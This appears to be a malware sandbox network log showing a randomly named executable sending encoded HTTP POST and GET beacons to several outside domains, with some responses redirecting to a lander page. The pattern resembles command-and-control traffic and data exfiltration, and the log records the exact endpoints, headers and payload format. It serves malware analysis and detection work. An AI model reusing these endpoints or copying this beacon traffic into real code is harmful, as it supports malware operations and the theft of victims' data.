                                                                                                                                                                          17192.168.2.5499943.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:01.398555994 CEST784OUTPOST /0gjs/ HTTP/1.1
                                                                                                                                                                          Host: www.starseedtechs.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.starseedtechs.net
                                                                                                                                                                          Referer: http://www.starseedtechs.net/0gjs/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 32 36 46 75 4c 55 6a 6f 48 33 68 79 68 75 65 2f 57 68 65 79 63 57 51 59 54 71 32 36 4d 56 73 44 6c 2f 47 72 57 39 61 4e 74 49 34 55 7a 39 44 68 78 76 4b 57 58 52 75 77 76 63 76 32 4c 4b 44 6e 66 48 55 43 38 63 4f 6d 39 59 42 52 5a 63 77 47 6f 2f 6f 78 72 78 68 65 2b 73 52 77 46 78 57 45 4a 4c 64 4f 66 44 66 74 71 76 46 50 44 6a 63 6b 54 59 49 6f 4a 33 73 59 46 70 56 4d 72 30 68 30 62 2f 68 53 68 30 50 6d 53 4c 72 4e 6e 45 77 45 45 34 58 75 51 46 43 6e 76 36 4c 66 4b 2b 35 4b 32 58 55 51 62 6b 56 4b 65 6d 6c 58 59 36 32 52 34 4e 49 50 54 2b 6c 79 54 37 4d 6c 78 76 63 5a 68 72 71 61 4a 42 55 3d
                                                                                                                                                                          Data Ascii: 9X=26FuLUjoH3hyhue/WheycWQYTq26MVsDl/GrW9aNtI4Uz9DhxvKWXRuwvcv2LKDnfHUC8cOm9YBRZcwGo/oxrxhe+sRwFxWEJLdOfDftqvFPDjckTYIoJ3sYFpVMr0h0b/hSh0PmSLrNnEwEE4XuQFCnv6LfK+5K2XUQbkVKemlXY62R4NIPT+lyT7MlxvcZhrqaJBU=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          18192.168.2.5499953.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:03.947727919 CEST804OUTPOST /0gjs/ HTTP/1.1
                                                                                                                                                                          Host: www.starseedtechs.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.starseedtechs.net
                                                                                                                                                                          Referer: http://www.starseedtechs.net/0gjs/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 32 36 46 75 4c 55 6a 6f 48 33 68 79 6a 50 75 2f 58 43 32 79 55 57 51 62 66 4b 32 36 57 6c 74 4b 6c 2f 43 72 57 2f 33 47 74 37 51 55 79 59 2f 68 77 74 79 57 45 68 75 77 6b 38 76 33 57 36 44 73 66 48 51 67 38 63 79 6d 39 59 46 52 5a 59 38 47 6f 75 6f 79 71 68 68 41 34 73 52 32 4b 52 57 45 4a 4c 64 4f 66 48 32 77 71 76 4e 50 44 79 73 6b 4a 35 49 6e 49 33 73 62 43 70 56 4d 68 6b 67 2f 62 2f 68 73 68 32 37 59 53 4a 6a 4e 6e 41 30 45 45 70 58 68 5a 46 43 6c 68 61 4b 63 5a 75 64 50 32 57 4d 6d 53 45 63 50 41 6d 63 70 5a 4d 48 37 69 76 41 6e 41 65 4a 4b 44 6f 45 53 67 66 39 77 37 49 36 71 58 57 42 30 56 61 34 68 72 56 79 69 53 78 4e 4d 6b 43 36 5a 71 46 45 39
                                                                                                                                                                          Data Ascii: 9X=26FuLUjoH3hyjPu/XC2yUWQbfK26WltKl/CrW/3Gt7QUyY/hwtyWEhuwk8v3W6DsfHQg8cym9YFRZY8GouoyqhhA4sR2KRWEJLdOfH2wqvNPDyskJ5InI3sbCpVMhkg/b/hsh27YSJjNnA0EEpXhZFClhaKcZudP2WMmSEcPAmcpZMH7ivAnAeJKDoESgf9w7I6qXWB0Va4hrVyiSxNMkC6ZqFE9


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          19192.168.2.5499963.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:06.507873058 CEST1821OUTPOST /0gjs/ HTTP/1.1
                                                                                                                                                                          Host: www.starseedtechs.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.starseedtechs.net
                                                                                                                                                                          Referer: http://www.starseedtechs.net/0gjs/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 32 36 46 75 4c 55 6a 6f 48 33 68 79 6a 50 75 2f 58 43 32 79 55 57 51 62 66 4b 32 36 57 6c 74 4b 6c 2f 43 72 57 2f 33 47 74 37 49 55 79 71 48 68 78 4d 79 57 56 52 75 77 34 73 76 79 57 36 44 78 66 47 30 6b 38 63 2b 32 39 65 5a 52 5a 37 30 47 35 4d 4d 79 6b 68 68 41 30 4d 52 7a 46 78 57 52 4a 4c 4e 43 66 44 61 77 71 76 4e 50 44 77 30 6b 66 34 49 6e 46 58 73 59 46 70 56 70 72 30 67 58 62 2f 34 58 68 32 2b 74 53 36 62 4e 6d 67 6b 45 43 61 2f 68 53 46 43 72 69 61 4b 2b 5a 75 67 66 32 57 67 51 53 48 41 31 41 6c 4d 70 5a 71 6d 53 37 2f 55 41 57 4d 52 62 48 35 41 4c 77 6f 6c 65 32 5a 32 59 53 33 68 74 50 6f 49 2b 67 7a 71 61 48 51 41 39 2f 56 43 4a 6c 46 39 6a 4a 75 57 48 4e 77 6d 31 71 53 52 58 31 4c 35 71 4a 6e 72 78 44 73 62 58 46 4d 62 2b 51 51 68 42 41 2f 47 4d 2f 4c 59 42 68 41 31 46 43 52 4d 53 67 4e 57 74 52 6c 78 61 38 6e 68 61 58 6b 2b 71 6d 6d 6a 62 59 37 76 4f 2b 32 63 47 4a 76 36 32 67 47 58 48 69 32 50 4b 48 4a 35 6e 38 62 35 69 35 2f 6d 61 69 44 33 45 51 70 38 74 61 62 6a 58 5a 6c 76 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=26FuLUjoH3hyjPu/XC2yUWQbfK26WltKl/CrW/3Gt7IUyqHhxMyWVRuw4svyW6DxfG0k8c+29eZRZ70G5MMykhhA0MRzFxWRJLNCfDawqvNPDw0kf4InFXsYFpVpr0gXb/4Xh2+tS6bNmgkECa/hSFCriaK+Zugf2WgQSHA1AlMpZqmS7/UAWMRbH5ALwole2Z2YS3htPoI+gzqaHQA9/VCJlF9jJuWHNwm1qSRX1L5qJnrxDsbXFMb+QQhBA/GM/LYBhA1FCRMSgNWtRlxa8nhaXk+qmmjbY7vO+2cGJv62gGXHi2PKHJ5n8b5i5/maiD3EQp8tabjXZlvZhlQSW87pxrQRT5+gyHG0e9Cr/1QsJunXQHrPLn8uvKQhBzYSialX9w4nkj16DM02X5IxgF+gJA3+AExgi+//QrbcVnbUpEgTPIA10XJl1G/GY8N1JVoS6rc4dmfFvDhSv9LzlIgLIWZiEuZF1vfp7SVoEtO6b/F5Zhg2sbhgTp2bGfUi9lF3CQlVkc85MJSywyBUO1BlllmQsyj9tglzdybIeePC2cLVZXMqhJIuT/Uk7cevcORRwcP0ulShRhh/zffr1HOgNYWCm5/QyfAa9U4yjZfLHw/vSrzS5oSm4eBLS8kIaAT4JckWycD+kvspZQhg15QUEXts7oXi5U2btVqVQDeW1daqsAUtccmwY0iF+fx5CqIFTaLnjdZx5Ris1Kkk62f7hikej4a7GkdKkKRhLCX2aTQvd3pQzdpBdWkKJteFI/cVjxCJZJmUaNCY0AibhHEKhyXA//1u4gV6tFuu0P6dsDM95s+LaOoUiaFZfmA7wjJWC6AwduQ/XPGMCzSMY57+H4DO4SJfx/fwZnHHm2e+BpLnCnRqEAWttjJAtljmoRYzma2CegmjL2T9LKvDymvwgj8nothEC1ZHihM7/MBzu6ZM8l/61ptDegIEjP0d/n4asd0VWhj8Z7SBJGKhJowgVgTZHkT3Z+2JHM59nTPbazcqP [TRUNCATED]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          20192.168.2.5499973.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:09.055131912 CEST525OUTGET /0gjs/?9X=74tOIgHVPHNRmMSbQ1G0Uys/MIeqG11kjpC3ScHU6uMB9ofcxcyuUhnM5ZTTEMr+dzoew9aF0rRRY7d44cQMhCha9Z99IC62F/V5eh7ipP5pSwEDea0JBXw5a45Uq3V7Aw==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.starseedtechs.net
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:14:09.680461884 CEST413INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:09 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 273
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 58 3d 37 34 74 4f 49 67 48 56 50 48 4e 52 6d 4d 53 62 51 31 47 30 55 79 73 2f 4d 49 65 71 47 31 31 6b 6a 70 43 33 53 63 48 55 36 75 4d 42 39 6f 66 63 78 63 79 75 55 68 6e 4d 35 5a 54 54 45 4d 72 2b 64 7a 6f 65 77 39 61 46 30 72 52 52 59 37 64 34 34 63 51 4d 68 43 68 61 39 5a 39 39 49 43 36 32 46 2f 56 35 65 68 37 69 70 50 35 70 53 77 45 44 65 61 30 4a 42 58 77 35 61 34 35 55 71 33 56 37 41 77 3d 3d 26 31 42 53 48 75 3d 4f 42 56 78 47 68 38 50 55 54 66 6c 53 76 34 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9X=74tOIgHVPHNRmMSbQ1G0Uys/MIeqG11kjpC3ScHU6uMB9ofcxcyuUhnM5ZTTEMr+dzoew9aF0rRRY7d44cQMhCha9Z99IC62F/V5eh7ipP5pSwEDea0JBXw5a45Uq3V7Aw==&1BSHu=OBVxGh8PUTflSv4p"}</script></head></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          21192.168.2.5499983.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:14.739398003 CEST766OUTPOST /0bnh/ HTTP/1.1
                                                                                                                                                                          Host: www.dorabox.org
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.dorabox.org
                                                                                                                                                                          Referer: http://www.dorabox.org/0bnh/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 62 2f 32 4c 69 30 4a 54 47 66 55 51 51 62 2f 61 44 62 76 71 33 79 49 48 74 71 33 44 64 6f 61 41 6b 50 76 49 46 38 72 34 75 61 6b 6e 70 6e 39 4a 46 41 35 46 67 71 72 53 59 6c 76 61 38 4c 6a 7a 31 65 34 46 31 7a 51 5a 51 7a 6a 44 6f 4a 2b 75 4d 70 70 67 64 36 55 50 54 32 35 4b 39 58 34 78 6a 76 75 74 32 45 36 53 57 30 52 52 7a 58 2b 53 2b 37 34 53 6f 5a 68 4d 63 62 34 6c 67 59 42 44 6e 45 39 6f 76 2b 76 64 65 59 55 33 64 71 37 52 67 64 6c 37 42 4d 75 69 68 33 36 32 70 33 53 32 59 5a 52 35 4d 57 76 62 78 37 46 33 36 48 41 55 30 4e 47 67 57 46 73 34 36 30 61 30 53 31 30 37 51 66 6f 79 6b 4d 3d
                                                                                                                                                                          Data Ascii: 9X=+b/2Li0JTGfUQQb/aDbvq3yIHtq3DdoaAkPvIF8r4uaknpn9JFA5FgqrSYlva8Ljz1e4F1zQZQzjDoJ+uMppgd6UPT25K9X4xjvut2E6SW0RRzX+S+74SoZhMcb4lgYBDnE9ov+vdeYU3dq7Rgdl7BMuih362p3S2YZR5MWvbx7F36HAU0NGgWFs460a0S107QfoykM=


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          22192.168.2.5499993.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:17.349052906 CEST786OUTPOST /0bnh/ HTTP/1.1
                                                                                                                                                                          Host: www.dorabox.org
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.dorabox.org
                                                                                                                                                                          Referer: http://www.dorabox.org/0bnh/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 62 2f 32 4c 69 30 4a 54 47 66 55 42 41 72 2f 59 67 7a 76 39 48 79 4c 65 4e 71 33 4a 39 70 54 41 6b 44 76 49 45 4a 7a 34 63 2b 6b 6e 49 58 39 49 45 41 35 43 67 71 72 5a 34 6c 33 65 38 4c 53 7a 31 44 46 46 33 6e 51 5a 51 6e 6a 44 6f 5a 2b 76 36 68 6d 6d 4e 36 53 4a 54 32 37 45 64 58 34 78 6a 76 75 74 32 67 51 53 57 73 52 52 67 50 2b 51 66 37 37 66 49 5a 69 50 63 62 34 68 67 59 46 44 6e 45 6c 6f 72 2f 49 64 59 63 55 33 63 61 37 52 78 64 71 31 42 4d 73 6d 68 32 49 6d 4a 57 74 78 61 4e 6b 30 4d 4c 75 4d 33 50 2b 2f 73 32 71 4f 57 46 75 7a 32 70 55 6f 70 38 74 6c 69 55 64 68 7a 50 59 73 7a 61 61 68 70 75 43 4d 69 6b 50 5a 61 63 45 4a 65 55 52 2f 42 33 58
                                                                                                                                                                          Data Ascii: 9X=+b/2Li0JTGfUBAr/Ygzv9HyLeNq3J9pTAkDvIEJz4c+knIX9IEA5CgqrZ4l3e8LSz1DFF3nQZQnjDoZ+v6hmmN6SJT27EdX4xjvut2gQSWsRRgP+Qf77fIZiPcb4hgYFDnElor/IdYcU3ca7Rxdq1BMsmh2ImJWtxaNk0MLuM3P+/s2qOWFuz2pUop8tliUdhzPYszaahpuCMikPZacEJeUR/B3X


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          23192.168.2.5500003.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:19.970830917 CEST1803OUTPOST /0bnh/ HTTP/1.1
                                                                                                                                                                          Host: www.dorabox.org
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.dorabox.org
                                                                                                                                                                          Referer: http://www.dorabox.org/0bnh/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 2b 62 2f 32 4c 69 30 4a 54 47 66 55 42 41 72 2f 59 67 7a 76 39 48 79 4c 65 4e 71 33 4a 39 70 54 41 6b 44 76 49 45 4a 7a 34 63 32 6b 6e 61 66 39 4a 6e 6f 35 44 67 71 72 46 49 6c 30 65 38 4c 31 7a 31 62 42 46 33 72 71 5a 57 72 6a 52 65 56 2b 6f 50 42 6d 76 4e 36 53 46 7a 32 34 4b 39 57 36 78 6a 2f 71 74 32 51 51 53 57 73 52 52 6d 6a 2b 65 65 37 37 64 49 5a 68 4d 63 62 30 6c 67 59 39 44 6e 38 31 6f 72 36 2f 65 6f 38 55 33 38 4b 37 64 6a 6c 71 39 42 4d 71 72 42 32 51 6d 4a 61 4d 78 61 42 65 30 50 58 55 4d 77 37 2b 75 59 66 2b 66 69 52 73 33 77 78 65 74 4f 30 2b 78 43 67 59 70 69 37 43 68 44 50 2f 38 4a 71 33 43 6c 4a 4f 66 34 4e 54 61 62 46 4c 79 6c 61 4a 54 6c 6e 4c 79 70 42 6c 53 55 6b 68 77 4e 45 57 7a 77 2b 33 53 6b 5a 52 72 71 4b 35 32 43 59 58 4c 54 70 72 52 54 35 31 75 49 75 64 78 6c 2b 37 37 38 73 76 2b 54 69 6a 30 6e 72 6c 48 48 67 42 7a 48 72 46 33 4e 63 37 47 36 2b 6c 48 6e 30 39 74 76 4d 68 6a 70 6d 53 62 36 51 2f 51 57 4a 6e 33 54 58 70 63 56 77 6b 38 33 5a 46 4c 6d 76 47 2f 35 33 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=+b/2Li0JTGfUBAr/Ygzv9HyLeNq3J9pTAkDvIEJz4c2knaf9Jno5DgqrFIl0e8L1z1bBF3rqZWrjReV+oPBmvN6SFz24K9W6xj/qt2QQSWsRRmj+ee77dIZhMcb0lgY9Dn81or6/eo8U38K7djlq9BMqrB2QmJaMxaBe0PXUMw7+uYf+fiRs3wxetO0+xCgYpi7ChDP/8Jq3ClJOf4NTabFLylaJTlnLypBlSUkhwNEWzw+3SkZRrqK52CYXLTprRT51uIudxl+778sv+Tij0nrlHHgBzHrF3Nc7G6+lHn09tvMhjpmSb6Q/QWJn3TXpcVwk83ZFLmvG/53qH3Q5OBg8Juyrhy5higfyARypS3pQQB6kXZN8xHSN8p8HHS1MiP7E8dbHK4jcre2PEyhd1UKhy4USN4Oj65n246S7PBuKhSxPare9pP0wVA2GET4gl0dyDnpcucXOS9I5E+rL7qoIMkdMN1/jinwaLtHeAYLo5lOweYOQD/pfhsNesLyegxPx16N74oMUh0bRJo8km8Tw688me86e20wkcNDx4us0xfbvegFftuBaZgcai0okNbdnvHfJUkTrFvAP4Nyr+eHmBs/C4mrxerg/hu/kjd68+I/0z+GMwVgg6o8V+s2XS8tw1jQjBRIyTQIgoZOQWQvFLbg5DAGvPnaKvybk8vj6xv/iD7HRLetRzV1BJUrhhYfGs4qeLyMto2hJ6LX7YuKUXI92oFTGrLDfXvy4XbWMcXSCvsqNUT62ocm7BhsPG+aZqlhTj2KJ7xr3i/MIPUhEFhyi4KjhhcSLjgxpdGhtHOkSlOKrxlAJ0iE8CFZ1zCvmj3TmVu8ofMA06I3d9y7vGnRdBKMDsjzCJY563iiS9uSXgS3iRNjSGRsWPoIP5+NphQYKbXaYTsnNfZMarX0i7IFx0pobh4LkD/fb31wQ0FXtORB+hNgoGzlmFCK0wa8gRmu0PSm3eB/tZvaIM1CMVArKuhl81x9UzxkWpNYESVZ0X [TRUNCATED]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          24192.168.2.5500013.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:22.510417938 CEST519OUTGET /0bnh/?9X=zZXWIXwJGHT3YBrxenCypQewBaeTOcc2IkXhL3E/vJODxaDeFGEsUBe5EIIVaKr42GHnJ3fTVzrjb5tyhN1drPCSMiPgIdm81GPSp2FgZ1oqABPTTdL0d8xPd8XwsRNOYg==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.dorabox.org
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:14:24.081630945 CEST413INHTTP/1.1 200 OK
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:24 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 273
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 58 3d 7a 5a 58 57 49 58 77 4a 47 48 54 33 59 42 72 78 65 6e 43 79 70 51 65 77 42 61 65 54 4f 63 63 32 49 6b 58 68 4c 33 45 2f 76 4a 4f 44 78 61 44 65 46 47 45 73 55 42 65 35 45 49 49 56 61 4b 72 34 32 47 48 6e 4a 33 66 54 56 7a 72 6a 62 35 74 79 68 4e 31 64 72 50 43 53 4d 69 50 67 49 64 6d 38 31 47 50 53 70 32 46 67 5a 31 6f 71 41 42 50 54 54 64 4c 30 64 38 78 50 64 38 58 77 73 52 4e 4f 59 67 3d 3d 26 31 42 53 48 75 3d 4f 42 56 78 47 68 38 50 55 54 66 6c 53 76 34 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9X=zZXWIXwJGHT3YBrxenCypQewBaeTOcc2IkXhL3E/vJODxaDeFGEsUBe5EIIVaKr42GHnJ3fTVzrjb5tyhN1drPCSMiPgIdm81GPSp2FgZ1oqABPTTdL0d8xPd8XwsRNOYg==&1BSHu=OBVxGh8PUTflSv4p"}</script></head></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          25192.168.2.550002206.238.184.168802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:29.756053925 CEST763OUTPOST /msip/ HTTP/1.1
                                                                                                                                                                          Host: www.lpskfz.top
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.lpskfz.top
                                                                                                                                                                          Referer: http://www.lpskfz.top/msip/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 34 59 54 33 59 31 7a 48 33 67 4c 7a 4e 6c 41 33 47 73 4a 53 49 64 59 68 31 56 64 62 64 53 6f 31 48 76 73 44 42 41 34 48 2b 56 75 42 6f 6d 58 44 72 51 6e 78 39 34 61 76 70 67 70 38 45 36 68 77 32 46 2b 55 39 2f 7a 43 77 34 46 51 58 71 65 54 70 42 4a 37 48 69 38 4c 44 43 77 45 2b 6c 4f 52 33 7a 67 70 43 49 30 4f 32 63 41 50 4b 72 58 30 46 4e 4b 5a 4e 4b 53 42 35 44 79 48 62 6b 50 34 6a 54 67 69 4f 78 54 7a 7a 41 7a 4e 45 35 6c 52 57 49 48 45 59 77 59 36 52 31 67 69 2b 79 49 69 41 6c 49 58 7a 77 46 51 34 57 31 78 4c 6c 61 7a 74 53 61 44 73 51 78 79 7a 4d 65 42 6d 6d 67 4f 75 5a 42 57 4e 51 3d
                                                                                                                                                                          Data Ascii: 9X=94YT3Y1zH3gLzNlA3GsJSIdYh1VdbdSo1HvsDBA4H+VuBomXDrQnx94avpgp8E6hw2F+U9/zCw4FQXqeTpBJ7Hi8LDCwE+lOR3zgpCI0O2cAPKrX0FNKZNKSB5DyHbkP4jTgiOxTzzAzNE5lRWIHEYwY6R1gi+yIiAlIXzwFQ4W1xLlaztSaDsQxyzMeBmmgOuZBWNQ=
                                                                                                                                                                          Oct 23, 2024 17:14:30.724155903 CEST401INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
